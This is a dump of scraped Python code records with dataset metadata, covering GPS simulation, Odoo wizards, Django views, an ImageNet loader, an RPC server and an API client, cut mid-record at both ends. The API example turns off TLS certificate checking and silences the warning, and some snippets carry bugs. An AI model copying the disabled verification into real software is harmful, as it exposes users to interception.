y\n","sub_path":"generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"164255651","text":"import numpy as np\nfrom pyquaternion import Quaternion\nimport matplotlib.pyplot as plt\n\nclass Satelite():\n '''\n GPS satellites fly in medium Earth orbit (MEO) at an altitude of approximately 20,200 km\n Operating frequency 1575.42MHz\n '''\n
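# Editor's note: at the L1 carrier frequency the wavelength is c / f =\n# 3e8 / 1575.42e6, roughly 0.1904 m, which is why phase_calculate() below works\n# with the sub-wavelength remainder (distance % self.wavelength). A hedged\n# check of that constant:\n#\n# assert abs(3e8 / 1575.42e6 - 0.1904) < 1e-3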
def __init__(self, x, y):\n self.location = np.array((x,y,20200*1000))\n self.frequency = 1575.42e6\n self.wavelength = 3e8/self.frequency\n # self.phase_noise = phase_noise\n\n def phase_calculate(self, rx_location, phase_noise=0.01):\n distance = np.linalg.norm(self.location-rx_location)\n phase = (distance % self.wavelength)*2*np.pi\n phase += np.random.randn(*phase.shape) * phase_noise\n return phase\n\n def line_of_sight(self, drone_location):\n self.los = self.location-drone_location\n self.los /= np.sum(self.los)\n\nclass Drone():\n '''\n Quadcopter with 4 GPS receivers\n '''\n def __init__(self, location, quaternion, noise_pwr = 0.01):\n self.location = location\n self.quaternion = Quaternion(quaternion)\n self.rx = np.zeros((4,3))\n self.noise_pwr = noise_pwr\n\n def rotate(self, arm_length):\n self.rx = np.array(([arm_length,0,0],[-arm_length,0,0],[0,arm_length,0],\n [0,-arm_length,0]))\n for i in range(4):\n self.rx[i] = self.quaternion.rotate(self.rx[i])\n self.rx[i] += self.location\n # self.rx[i] += np.random.randn(3)*self.noise_pwr\n\n def phase_calculate(self, satelite):\n phase = np.zeros(4)\n for i in range(4):\n phase[i] = satelite.phase_calculate(self.rx[i])\n return phase\n\nclass Model():\n '''\n System model:\n measurement: doubleDiffRxSate\n state transition: doubleDiffRxTime\n '''\n def __init__(self, N, rx_num):\n self.N = N\n self.rx_num = rx_num\n self.singleDiffRx = np.zeros((N,rx_num,2))\n self.doubleDiffRxSate = np.zeros((N,rx_num))\n self.singleDiffTime = np.zeros((N,rx_num,2))\n self.doubleDiffRxTime = np.zeros((N,rx_num))\n\n def diff_calculate(self, phase):\n for j in range(self.rx_num):\n self.singleDiffRx[0][j] = phase[0][j]-phase[0][0]\n self.doubleDiffRxSate[0] = self.singleDiffRx[0,:,0]-self.singleDiffRx[0,:,1]\n for i in range(1,self.N):\n for j in range(self.rx_num):\n self.singleDiffRx[i][j] = phase[i][j]-phase[i][0]\n self.doubleDiffRxSate[i] = self.singleDiffRx[i,:,0]-self.singleDiffRx[i,:,1]\n self.singleDiffTime[i] = phase[i]-phase[i-1]\n self.doubleDiffRxTime[i] = self.doubleDiffRxSate[i]-self.doubleDiffRxSate[i-1]\n\nclass Filter():\n def __init__(self, N):\n self.estimation = np.zeros((N,4))\n","sub_path":"track_orientation.py","file_name":"track_orientation.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"446611666","text":"\"\"\"\n7.\tWrite a program that proves or verifies that, for the set of\nnatural numbers, the equality 1+2+...+n = n(n+1)/2 holds,\n where n is any natural number.\n\"\"\"\n\nprint(\"Checking the equality: 1+2+...+n = n(n+1)/2, where n is any natural number.\")\nuserInput = int(input(\"Enter a number: \"))\n\nleft_side = 0\n\nfor i in range(1, userInput + 1):\n left_side += i\n\nright_side = userInput * (userInput + 1) // 2\n\nif left_side == right_side:\n print(\"The equality is proven\")\nelse:\n print(\"The equality is not proven\")","sub_path":"Lesson_2/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"351563179","text":"# a,b = map(eval,input().split())\n# a1=round(a,0)\n# b1=round(b,2)\n# print((a1*b1)//100)\na, b = input().split()\nA = int(a)\nB = float(b)\n
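# Editor's note: the lines below avoid binary floating-point error by scaling\n# the decimal input to integer hundredths (round(100*B)) before multiplying,\n# then floor-dividing back. A hedged worked example: A = 3, B = 1.10 gives\n# B100 = 110, C = 330 and C//100 = 3, the integer part of 3 * 1.10.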
round(100*B)\nprint(B100)\nC=A*B100\nprint(str(C//100))","sub_path":"m3.py","file_name":"m3.py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"133326562","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\nfrom odoo.exceptions import ValidationError\n\n\nclass PaiementChequeClientWizard(models.TransientModel):\n _name = \"paiement.cheque.client.wizard\"\n\n cheque_id = fields.Many2one('paiement.cheque.client', string=u'Chèque', readonly=True)\n amount = fields.Float(string=u'Montant', readonly=True)\n due_date = fields.Date(string=u'Echéance', readonly=True)\n ok = fields.Boolean(u'Transférer?')\n caisse_id = fields.Many2one('caisse.to.central', 'Caisse', readonly=True)\n\n\nclass PaiementEffetClientWizard(models.TransientModel):\n _name = \"paiement.effet.client.wizard\"\n\n effet_id = fields.Many2one('paiement.effet.client', string=u'Effet', readonly=True)\n amount = fields.Float(string=u'Montant', readonly=True)\n due_date = fields.Date(string=u'Echéance', readonly=True)\n ok = fields.Boolean(u'Transférer?')\n caisse_id = fields.Many2one('caisse.to.central', 'Caisse', readonly=True)\n\n\nclass PaiementOvClientWizard(models.TransientModel):\n _name = \"paiement.ov.client.wizard\"\n\n ov_id = fields.Many2one('paiement.ov.client', string=u'OV', readonly=True)\n amount = fields.Float(string=u'Montant', readonly=True)\n due_date = fields.Date(string=u'Echéance', readonly=True)\n ok = fields.Boolean(u'Transférer?')\n caisse_id = fields.Many2one('caisse.to.central', 'Caisse', readonly=True)\n\n\nclass PaiementCbClientWizard(models.TransientModel):\n _name = \"paiement.cb.client.wizard\"\n\n cb_id = fields.Many2one('paiement.cb.client', string=u'CB', readonly=True)\n amount = fields.Float(string=u'Montant', readonly=True)\n due_date = fields.Date(string=u'Echéance', readonly=True)\n ok = fields.Boolean(u'Transférer?')\n caisse_id = fields.Many2one('caisse.to.central', 'Caisse', readonly=True)\n\n\nclass PaiementCashClientWizard(models.TransientModel):\n _name = \"paiement.cash.client.wizard\"\n\n cash_id = fields.Many2one('paiement.cash.client', string=u'Espèce', readonly=True)\n amount = fields.Float(string=u'Montant', readonly=True)\n due_date = fields.Date(string=u'Echéance', readonly=True)\n ok = fields.Boolean(u'Transférer?')\n caisse_id = fields.Many2one('caisse.to.central', 'Caisse', readonly=True)\n\n\nclass CaisseToCentral(models.TransientModel):\n _name = \"caisse.to.central\"\n \n cheque_lines = fields.One2many('paiement.cheque.client.wizard', 'caisse_id', string=u'Chèques')\n effet_lines = fields.One2many('paiement.effet.client.wizard', 'caisse_id', string=u'Effets')\n ov_lines = fields.One2many('paiement.ov.client.wizard', 'caisse_id', string=u'OV')\n cb_lines = fields.One2many('paiement.cb.client.wizard', 'caisse_id', string=u'OV')\n cash_lines = fields.One2many('paiement.cash.client.wizard', 'caisse_id', string=u'Espèces')\n total_cheque = fields.Float(string=u'Total chèques', readonly=True)\n total_effet = fields.Float(string=u'Total effets', readonly=True)\n\n @api.model\n def _partial_cheque(self, cheque):\n partial_cheque = {\n 'cheque_id': cheque.id,\n 'amount': cheque.amount,\n 'due_date': cheque.due_date,\n }\n return partial_cheque\n\n @api.model\n def _partial_effet(self, effet):\n partial_effet = {\n 'effet_id': effet.id,\n 'amount': effet.amount,\n 'due_date': effet.due_date,\n }\n return partial_effet\n\n @api.model\n def _partial_ov(self, ov):\n 
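The m3.py record above multiplies the price by 100 and rounds before doing integer arithmetic, which sidesteps binary floating-point artifacts. A small illustration of why:

```python
price, qty = 4.90, 3
print(price * qty)           # 14.700000000000001 on typical IEEE-754 platforms
cents = round(price * 100)   # 490, an exact integer
print(qty * cents // 100)    # 14 whole units, computed exactly
```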
partial_ov = {\n 'ov_id': ov.id,\n 'amount': ov.amount,\n }\n return partial_ov\n\n @api.model\n def _partial_cb(self, cb):\n partial_cb = {\n 'cb_id': cb.id,\n 'amount': cb.amount,\n }\n return partial_cb\n\n @api.model\n def _partial_cash(self, cash):\n partial_cash = {\n 'cash_id': cash.id,\n 'amount': cash.amount,\n }\n return partial_cash\n\n @api.model\n def default_get(self, fields):\n res = super(CaisseToCentral, self).default_get(fields)\n caisse_id = self.env.context['active_id']\n caisse = self.env['paiement.caisse'].browse(caisse_id)\n if caisse.caisse_centrale == True:\n raise ValidationError(u\"Vous devez seulement transférer à partir d'une caisse normale\")\n if 'cheque_lines' in fields:\n line = [(0, 0, self._partial_cheque(m)) for m in caisse.cheque_lines]\n res.update(cheque_lines=line)\n if 'effet_lines' in fields:\n line = [(0, 0, self._partial_effet(m)) for m in caisse.effet_lines]\n res.update(effet_lines=line)\n if 'ov_lines' in fields:\n line = [(0, 0, self._partial_ov(m)) for m in caisse.ov_lines]\n res.update(ov_lines = line)\n if 'cb_lines' in fields:\n line = [(0, 0, self._partial_cb(m)) for m in caisse.cb_lines]\n res.update(cb_lines = line)\n if 'cash_lines' in fields:\n line = [(0, 0, self._partial_cash(m)) for m in caisse.cash_lines]\n res.update(cash_lines = line)\n if 'total_cheque' in fields:\n total=0.0\n for ch in caisse.cheque_lines:\n total += ch.amount\n res.update(total_cheque=total)\n if 'total_effet' in fields:\n total=0.0\n for eff in caisse.effet_lines:\n total += eff.amount\n res.update(total_effet=total)\n return res\n\n def to_central_action(self):\n for wizard in self:\n for cheque in wizard.cheque_lines:\n if cheque.cheque_id.state == 'caisse' and cheque.ok:\n cheque.cheque_id.action_caisse_centrale()\n for effet in wizard.effet_lines:\n if effet.effet_id.state == 'caisse' and effet.ok:\n effet.effet_id.action_caisse_centrale()\n for ov in wizard.ov_lines:\n if ov.ov_id.state == 'caisse' and ov.ok:\n ov.ov_id.action_caisse_centrale()\n for cb in wizard.cb_lines:\n if cb.cb_id.state == 'caisse' and cb.ok:\n cb.cb_id.action_caisse_centrale()\n for cash in wizard.cash_lines:\n if cash.cash_id.state == 'caisse' and cash.ok:\n cash.cash_id.action_caisse_centrale()\n return {'type': 'ir.actions.act_window_close'}\n","sub_path":"account_tres_customer/wizard/caisse_to_central.py","file_name":"caisse_to_central.py","file_ext":"py","file_size_in_byte":6363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"575562149","text":"'''\nload imagenet test dataset as numpy array\nlen(test_x)==50000\n\nusage:\n\n import imagenet\n\n test_x, test_y = imagenet.load_imagenet_test()\n\n\n'''\nfrom PIL import Image\nfrom scipy.ndimage import filters\nimport os\nimport tensorflow as tf\nimport numpy as np\n\n# TRAIN_DIR_PATH = '/home/cwx17/data/imagenet/train'\n# TRAIN_X_PATH = '/home/cwx17/data/imagenet/train/img'\n# TRAIN_X_ARR_PATH = '/home/cwx17/data/imagenet/train/imgarr.npy'\n\nTEST_DIR_PATH = '/home/cwx17/data/imagenet/test/valid_32x32'\nTEST_X_PATH = '/home/cwx17/data/imagenet/test/valid_32x32'\nTRAIN_X_ARR_PATH = '/home/cwx17/data/imagenet/test.npy'\nTEST_X_ARR_PATH = '/home/cwx17/data/imagenet/test.npy'\n\n\ndef _fetch_array_x(path):\n file_names = os.listdir(path)\n file_names.sort()\n imgs = []\n # scale = 148 / float(64)\n # sigma = np.sqrt(scale) / 2.0\n for name in file_names:\n im = Image.open(os.path.join(path, name))\n img = np.asarray(im)\n # print(img.shape)\n if img.shape[0] != 32:\n 
print('err')\n        # im = im.crop((15,40,163,188))\n        # # img.setflags(write=True)\n        # # for dim in range(img.shape[2]):\n        # #     img[...,dim] = filters.gaussian_filter(img[...,dim], sigma=(sigma,sigma))\n        imgs.append(img)\n    print(len(imgs))\n\n    return np.array(imgs)\n\n\ndef _fetch_array_y(path):\n    evalue = []\n    with open(path, 'rb') as f:\n        for line in f.readlines():\n            q = line.decode('utf-8')\n            q = q.strip()\n            q = int(q.split(' ')[1])\n            evalue.append(q)\n    return np.array(evalue)\n\n\ndef load_imagenet(x_shape=(32, 32, 3), x_dtype=np.float32, y_dtype=np.int32,\n                  normalize_x=False):\n    \"\"\"\n    Load the imagenet dataset as NumPy arrays.\n    similar to load_not_mnist\n\n    Args:\n        Unimplemented!(haven't found a good way to resize) x_shape: Reshape each digit into this shape.  Default ``(218, 178)``.\n        x_dtype: Cast each digit into this data type.  Default `np.float32`.\n        y_dtype: Cast each label into this data type.  Default `np.int32`.\n        normalize_x (bool): Whether or not to normalize x into ``[0, 1]``,\n            by dividing each pixel value with 255.? (default :obj:`False`)\n\n    Returns:\n        (np.ndarray, np.ndarray), (np.ndarray, np.ndarray): The\n            (train_x, train_y), (test_x, test_y)\n    \n    \"\"\"\n\n    train_x = np.load(TRAIN_X_ARR_PATH, mmap_mode='r')\n    train_y = None\n    test_x = np.load(TEST_X_ARR_PATH, mmap_mode='r')\n    test_y = None\n\n    return (train_x, train_y), (test_x, test_y)\n\n\nif __name__ == '__main__':\n    print('pre load')\n    (_, _), (x_test, y_test) = load_imagenet()  # unpack the nested (train, test) tuples\n    print(x_test.shape)\n\n    np.save(TEST_X_PATH, x_test)\n","sub_path":"ood_regularizer/experiment/datasets/imagenet.py","file_name":"imagenet.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"496310144","text":"from random import randint\nfrom math import sqrt\nfrom PIL import Image\n\nimport base64\nfrom io import BytesIO\n\ndef t2i(text, key=1234):\n    if key > 8895:  # keep the key folding consistent with i2t\n        key = 8895 - key // 8895\n    if key < 1000:\n        key += 1000\n\n    size = sqrt(len(text))\n    if size != int(size):\n        size = size + 1\n    size = int(size)\n\n    image = Image.new('RGB', (size, size), (255, 255, 255))\n\n    pos = [0, 0]\n    for letter in text:\n        number = ord(letter) + key\n\n        red = randint(0, number // 100)\n        blue = number // 100 - red\n        green = number % 100 + 100\n        red += 100\n        blue += 100\n\n        rgb = (red, green, blue)\n\n        image.putpixel(pos, rgb)\n\n        pos[0] += 1\n        if pos[0] >= size:\n            pos[0] = 0\n            pos[1] += 1\n    if pos[0] == 0:\n        pos[1] -= 1\n    if pos[1] + 1 < size:\n        image = image.crop((0, 0, size, size - 1))  # crop returns a new image\n    return image\n\n\ndef i2t(image, key=1234):\n    if key > 8895:\n        key = 8895 - key // 8895\n    if key < 1000:\n        key += 1000\n    text = ''\n    for y in range(0, image.size[0]):\n        for x in range(0, image.size[1]):\n\n            rgb = image.getpixel((x, y))\n\n            if rgb == (255, 255, 255):\n                return text\n\n            number = (((rgb[0] - 100) + (rgb[2] - 100)) * 100 + (rgb[1] - 100)) - key\n            text += chr(number)\n    return text\n","sub_path":"ImageCoder.py","file_name":"ImageCoder.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"236992953","text":"from django.shortcuts import render\nfrom .models import Cart, CartItem\nfrom django.http import JsonResponse\nimport json\nimport ast\nfrom django.http import HttpResponse\nfrom products.models import Products\n\n# Create your views here.\n\n\ndef cart(request, ip):\n    crt = Cart.objects.get(userip=ip)\n    prods = CartItem.objects.filter(cart=crt)\n\n    return render(request, 
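The t2i/i2t pair above encodes each character's code point (offset by the key) into one RGB pixel and stops decoding at the first untouched white pixel. A round-trip check (requires Pillow; the import mirrors the record's filename and is hypothetical):

```python
from ImageCoder import t2i, i2t

secret = "hello world"
img = t2i(secret, key=2000)
assert i2t(img, key=2000) == secret  # same key on both sides
print("round trip ok")
```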
\"cart.html\", {\"products\": prods})\n\n\ndef update_quant(request):\n\n prod_id = request.GET.get(\"prod_id\")\n action = request.GET.get(\"action\")\n change = request.GET.get(\"change\")\n cartitem = request.GET.get(\"cartitem\")\n prod = Products.objects.get(id=prod_id)\n if action == \"add\":\n prod.quantity = prod.quantity - 1\n request.sessions[\"items\"] = request.session[\"items\"] - 1\n else:\n prod.quantity = prod.quantity + 1\n request.sessions[\"items\"] = request.session[\"items\"] + 1\n prod.save()\n item = CartItem.objects.get(id=cartitem)\n item.quantity = change\n if item.quantity == 0:\n item.save()\n else:\n item.delete()\n return HttpResponse(prod_id) # (context)\n","sub_path":"cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"20487883","text":"from django.shortcuts import render\r\n\r\n\r\ndef index(request):\r\n return render(request, 'index.html')\r\n\r\n\r\ndef count(request):\r\n count_num = len(request.GET['hello'])\r\n text = request.GET['hello']\r\n dic = {'hell': count_num,'text':text}\r\n dict = {}\r\n for word in text:\r\n if word not in dict:\r\n dict[word] = 1\r\n else:\r\n dict[word] += 1\r\n max_char = text[0]\r\n for key in dict:\r\n if dict[key]>dict[max_char]:\r\n max_char = key\r\n dic['max_char'] = max_char\r\n dic['max_num'] = dict[max_char]\r\n return render(request, 'count.html', dic)\r\n\r\n","sub_path":"wordcount/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"604603592","text":"\"\"\"Entry point for RPC processes.\"\"\"\n\nimport importlib\nimport os\nimport sys\n\nfrom myia.utils.serialize import MyiaDumper, MyiaLoader\n\nfrom . 
import _dead_handle\n\n\ndef _rpc_server():\n    # Try to prevent other libs from using stdout\n    sys.stdout = sys.stderr\n    do_pm = os.environ.get(\"MYIA_PYTEST_USE_PDB\", False)\n    dumper = MyiaDumper(1)\n    dumper.open()\n    loader = MyiaLoader(0)\n    pkg, name, init_args = loader.get_data()\n    try:\n        mod = importlib.import_module(pkg)\n        cls = getattr(mod, name)\n        iface = cls(**init_args)\n        dumper.represent(\"ready\")\n    except Exception as e:\n        if do_pm:  # pragma: no cover\n            import rpdb\n\n            rpdb.post_mortem()\n        dumper.represent(e)\n        return 1\n\n    while loader.check_data():\n        data = loader.get_data()\n        if isinstance(data, tuple):\n            name, args, kwargs = data\n            try:\n                meth = getattr(iface, name)\n                res = meth(*args, **kwargs)\n            except Exception as e:  # pragma: no cover\n                if do_pm:  # pragma: no cover\n                    import rpdb\n\n                    rpdb.post_mortem()\n                res = e\n            dumper.represent(res)\n        elif isinstance(data, list):\n            msg, arg = data\n            if msg == \"dead_handle\":\n                _dead_handle(arg)\n            elif msg == \"handle_call\":\n                try:\n                    res = arg[0](*arg[1], **arg[2])\n                except Exception as e:  # pragma: no cover\n                    if do_pm:  # pragma: no cover\n                        import rpdb\n\n                        rpdb.post_mortem()\n                    res = e\n                dumper.represent(res)\n            else:\n                raise ValueError(f\"Unknown message: {msg}\")  # pragma: no cover\n        else:  # pragma: no cover\n            raise TypeError(f\"bad data {data}\")\n    return 0\n\n\nsys.exit(_rpc_server())\n","sub_path":"myia/compile/channel/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"392173764","text":"import cv2\nimport argparse\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--images\", required=True,\n                help=\"path to input directory of images\")\nap.add_argument(\"-t\", \"--threshold\", type=float, default=100.0,\n                help=\"focus measures that fall below this value will be considered 'blurry'\")\nargs = vars(ap.parse_args())\n\ndef check_blur(image):\n    return cv2.Laplacian(image, cv2.CV_64F).var()\n\n\nimg = cv2.imread(args['images'])\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\nblur = check_blur(gray)\nprint(blur)\n# apply the advertised --threshold instead of leaving it parsed but unused\nif blur < args['threshold']:\n    print('blurry')\n","sub_path":"check_blur.py","file_name":"check_blur.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"396869208","text":"# -*- coding: utf-8 -*-\nfrom zope.interface import implements\n\nfrom Products.CMFCore.utils import getToolByName\nfrom Acquisition import aq_inner\nfrom genweb.core.interfaces import IHomePage\nfrom genweb.core.utils import pref_lang\n\n\nfrom plone.portlets.interfaces import IPortletDataProvider\nfrom plone.app.portlets.portlets import base\n\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\n\nfrom ulearn.core import _\nfrom zope.component.hooks import getSite\n\n\nclass ICustomButtonBarPortlet(IPortletDataProvider):\n    \"\"\" A portlet which can render the logged user profile information.\n    \"\"\"\n\n\nclass Assignment(base.Assignment):\n    implements(ICustomButtonBarPortlet)\n\n    title = _(u'custombuttonbar')\n\n\nclass Renderer(base.Renderer):\n\n    render = ViewPageTemplateFile('custombuttonbar.pt')\n\n    def getHomepage(self):\n        page = {}\n        context = aq_inner(self.context)\n        pc = getToolByName(context, 'portal_catalog')\n        result = pc.searchResults(object_provides=IHomePage.__identifier__,\n                                  Language=pref_lang())\n        page['body'] = result[0].CookedBody()\n\n        return page\n\n    def portal_url(self):\n        return self.portal().absolute_url()\n\n    def 
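The check_blur.py record above uses the variance of the Laplacian as a focus measure: blurring suppresses high frequencies, so the variance drops. A synthetic demonstration (requires OpenCV and NumPy):

```python
import cv2
import numpy as np

rng = np.random.default_rng(0)
sharp = (rng.random((200, 200)) * 255).astype(np.uint8)  # high-frequency noise
blurry = cv2.GaussianBlur(sharp, (9, 9), 0)
print(cv2.Laplacian(sharp, cv2.CV_64F).var())   # large focus measure
print(cv2.Laplacian(blurry, cv2.CV_64F).var())  # much smaller after blurring
```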
portal(self):\n        return getSite()\n\n    def pref_lang(self):\n        \"\"\" Extracts the current language for the current user\n        \"\"\"\n        lt = getToolByName(self.portal(), 'portal_languages')\n        return lt.getPreferredLanguage()\n\n\nclass AddForm(base.NullAddForm):\n\n    def create(self):\n        return Assignment()\n","sub_path":"ulearn/theme/portlets/custombuttonbar/custombuttonbar.py","file_name":"custombuttonbar.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"419576635","text":"# -*- coding: utf-8 -*-\n# @Time: 2020/10/16 11:01\n# @Author: Rollbear\n# @Filename: test_tiles_on_dblp.py\n\nimport unittest\nimport tiles as t\n\n\nclass TestOnDBLP(unittest.TestCase):\n    def test_dblp_phdthesis(self):\n        data_path = \"../../data/dblp_timestamp/phdthesis/2017.edgelist\"\n        output_path = \"../../data/dblp_timestamp/phdthesis/\"\n\n        tl = t.TILES(data_path,\n                     path=output_path)\n        tl.execute()  # run the algorithm\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"my_script/test/test_tiles_on_dblp.py","file_name":"test_tiles_on_dblp.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"176796298","text":"#import requests\n#from requests.auth import HTTPBasicAuth\n# Added to remove InsecureRequestWarning\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n# Removed this one\n#from requests_oauthlib import OAuth1\nimport hmac\nimport hashlib\nimport base64\nimport datetime\nimport time\nimport array\nimport json\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\ndef BuildRequestHeader( httpMethod, Uri, apiAccessKey, apiSecretKey ):\n    \"Builds the Request Header Dictionary\"\n    \n    # dictionary for request header parameters\n    headerDictionary = {}\n    \n    # set content-type for POST and PUT operations\n    if httpMethod == 'POST' or httpMethod == 'PUT':\n        headerDictionary['content-type'] = 'application/json'\n\n    # retrieve current timestamp in UTC \n    currentUtcTime = datetime.datetime.utcnow()\n\n    # perform signing\n    stringToSign = str(httpMethod + \"\\n\\n\\n\" + currentUtcTime.strftime('%Y-%m-%dT%H:%M:%SZ') + \"\\n\" + Uri).encode('utf-8')\n    digest = hmac.new(apiSecretKey, stringToSign, hashlib.sha256).digest()\n    signature = base64.b64encode(digest).decode('utf-8')\n\n    # Add authorization property to header dictionary\n    headerDictionary['Authorization'] = \"AGS\" + \" \" + apiAccessKey + \":\" + signature\n\n    # Add date property to header dictionary\n    headerDictionary['Date'] = currentUtcTime.strftime('%a, %d %b %Y %H:%M:%S +0000')\n\n    return headerDictionary\n\ndef SendRequest ( httpMethod, Uri, apiAccessKey, apiSecretKey ):\n    \"Sends request to study admin api and returns response\"\n    headerDictionary = BuildRequestHeader(httpMethod, Uri, apiAccessKey, apiSecretKey )\n    response = requests.get(Uri, headers=headerDictionary, verify=False)  # always issues a GET, which suits the read-only examples below\n    return response\n\nbaseUri = 'https://studyadmin-api.actigraphcorp.com'\napi_access_key = '<api access key goes here>'\napi_secret = str('<api secret key goes here>').encode('utf-8')\n\n# Get Studies Endpoint (returns list of studies)\nresourceUri = '/v1/studies'\nresponse = SendRequest('GET', baseUri + resourceUri, api_access_key, api_secret) \nprint ('response: ' )\nprint ( response.status_code )\nprint ( response.json() )\n\n\n## Get Study Endpoint (returns information on specific study)\n#studyId = '<Study Id Goes 
Here>'\n#resourceUri = '/v1/studies/' + studyId \n#response = SendRequest('GET', baseUri + resourceUri, api_access_key, api_secret)\n#print ( response.json() )\n\n## Get Study Subjects Endpoint (returns subjects within specific study)\n#studyId = '<Study Id Goes Here>'\n#resourceUri = '/v1/studies/' + studyId + '/subjects'\n#response = SendRequest('GET', baseUri + resourceUri, api_access_key, api_secret)\n#print ( response.json() )\n\n## Get Sites Endpoint (returns list of sites) \n#resourceUri = '/v1/sites'\n#response = SendRequest('GET', baseUri + resourceUri, api_access_key, api_secret)\n#print ( response.json() )\n\n## Get Subject Endpoint (returns information on specific subject)\n#subjectId = '<Subject Id goes here>'\n#resourceUri = '/v1/subjects/' + subjectId\n#response = SendRequest('GET', baseUri + resourceUri, api_access_key, api_secret)\n#print ( response.json() )\n","sub_path":"Examples/PythonExampleConnectingToAPI.py","file_name":"PythonExampleConnectingToAPI.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"506478400","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Sep 15 20:14:23 2018\r\n\r\n@author: Joyce\r\n\"\"\"\r\n#add needed\r\nfrom __future__ import print_function\r\n\r\nimport math\r\n\r\nfrom IPython import display\r\nfrom matplotlib import cm\r\nfrom matplotlib import gridspec\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn import metrics\r\nimport tensorflow as tf\r\nfrom tensorflow.python.data import Dataset\r\n\r\ntf.logging.set_verbosity(tf.logging.ERROR)\r\npd.options.display.max_rows = 10\r\npd.options.display.float_format = '{:.1f}'.format\r\n\r\n#read econoemeic date\r\necnm_dataframe = pd.read_csv(\"D:\\TF TEST LEARNING\\ls\\ecnm_ml\\ml_data_all.csv\", sep=\",\")\r\n\r\n#ecnm_dataframe = ecnm_dataframe.reindex(np.random.permutation(ecnm_dataframe.index))\r\n\r\ndef preprocess_features(california_housing_dataframe):\r\n \"\"\"Prepares input features from economic data set.\r\n\r\n Args:\r\n ecnm_dataframe: A Pandas DataFrame expected to contain data\r\n from the economic data set.\r\n Returns:\r\n A DataFrame that contains the features to be used for the model, including\r\n synthetic features.\r\n \"\"\"\r\n #\r\n selected_features = ecnm_dataframe[\r\n [\"y\",\"m\",\"d\",\"tw_Open\",\"tw_High\",\"tw_Low\",\"jp_Adj_Close\",\"chnsse_Adj_Close\",\"chnhs_Adj_Close\",\"ko_Adj_Close\",\"iny_Adj_Close\",\"ind_Adj_Close\",\"astsp_Adj_Close\",\"ast_Adj_Close\",\"usdow_Adj_Close\",\"usnsdq_Adj_Close\",\"usvix_Adj_Close\",\"ussp_Adj_Close\",\"eurestx_Adj_Close\",\"blx_Adj_Close\",\"fnc_Adj_Close\",\"grm_Adj_Close\",\"cnd_Adj_Close\",\"mxc_Adj_Close\",\"agt_Adj_Close\",\"chl_Adj_Close\",\"bx_Adj_Close\",\"Isrl_Adj_Close\",\"tw_VALUE\",\"jp_VALUE\",\"chn_VALUE\",\"chnhk_VALUE\",\"bx_VALUE\",\"cnd_VALUE\",\"ind_VALUE\",\"ko_VALUE\",\"mlx_VALUE\",\"mxc_VALUE\",\"sd_VALUE\",\"nafrc_VALUE\",\"sgp_VALUE\",\"sz_VALUE\",\"aut_VALUE\",\"eur_VALUE\",\"nzn_VALUE\",\"uk_VALUE\",\"RDSCUNT_RATE\",\"RATE_YEAR\",\"RATE\",\"BOND_RATE\",\"PRP_M\",\"PRP_M_P\",\"M1A\",\"M1B\",\"M2\",\"PUR_A\",\"ASSETS\",\"LIABILITIES\"]]\r\n processed_features = selected_features.copy()\r\n # Create a synthetic feature.\r\n processed_features[\"tw_delta\"] = ((ecnm_dataframe[\"tw_High\"]/1000.0) -(ecnm_dataframe[\"tw_Low\"]/1000.0))\r\n return processed_features\r\n\r\ndef preprocess_targets(california_housing_dataframe):\r\n \"\"\"Prepares 
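The ActiGraph example above is plain HMAC-SHA256 over a canonical string (method, timestamp, URI). The signing step in isolation, with dummy credentials and no network call:

```python
import base64
import datetime
import hashlib
import hmac

secret = b"dummy-secret"  # placeholder, not a real key
now = datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ')
string_to_sign = ("GET" + "\n\n\n" + now + "\n" + "https://example.org/v1/studies").encode('utf-8')
digest = hmac.new(secret, string_to_sign, hashlib.sha256).digest()
print("AGS dummy-access-key:" + base64.b64encode(digest).decode('utf-8'))
```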
